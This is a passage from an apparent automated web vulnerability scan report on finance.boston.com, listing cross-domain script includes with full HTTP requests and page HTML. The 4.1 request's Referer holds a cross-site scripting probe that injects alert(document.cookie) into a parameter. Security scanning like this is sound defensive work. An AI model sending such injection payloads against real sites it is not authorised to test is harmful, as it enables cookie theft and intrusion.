//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




4. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

4.1. http://finance.boston.com/boston/news/NaN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/NaN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /boston/news/NaN HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
Referer: http://finance.boston.com/boston/news/read?GUID=17744398&e2cff'-alert(document.cookie)-'e4c1d21a320=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc; RMFD=011PzzSjO105ya3; ssbusi=2; s_cc=true; s_sq=; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 13:37:21 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Thu, 17 Mar 2011 13:37:21 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 26145

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Stock Market | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<style type="text/css">
#error {
padding: 0 5px;
}
#error .box {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
background: #254f7c;
padding: 1em;
_height: 164px;
min-height: 164px;
color: #fff;
font-size: 1.5em;
position: relative;
}
#error .box.gray {
background: #2a2a2a;
}
#error .box .box_inner {
margin-top: 180px;
}
#error .box .icon {
height: 164px;
width: 164px;
position: absolute;
top: 20px;
left: 20px;
background: url(http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png) no-repeat top left;
_filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://images.financialcontent.com/studio-6.0/icons/164x164/404-icon.png', sizingMethod='image');
_background: transparent;
}
#error .box h3 {
color: #fff;
margin: 0;
padding: 0;
font-size: 2.0em;
    line-height: 2.0em;
font-weight: bold;
}
#error .box h3 strong {
color: #7cc45e;
text-transform: uppercase;
}
#error .box.gray h3 strong {
color: #718ba9;
}
#error .box .error-info {
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
padding: 1em;
background: #395F88;
}
#error .box.gray .error-info {
background: #3d3d3d;
}
#error .box.gray .error-detail {

}
</style>
<!-- /404 STYLING -->

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="50%" valign="top">
<div class="widget fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
</td>
<td width="50%" valign="top">
<div id="error">
<div class="box error">
<div class="box_header">
<div class="box_corner"></div>
</div>
<div class="icon"></div>
<div class="box_inner">
<h3><strong>Error:</strong> 404</h3>
<div class="error-info">
The page you requested cannot be found - please try one of the links above.
</div>
</div>
<div class="box_footer">
<div class="box_corner"></div>
</div>
</div>
</div>
</td>
</tr>
</table>




</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2FNaN%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




4.2. http://finance.boston.com/boston/news/read  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /boston/news/read?GUID=17744398 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
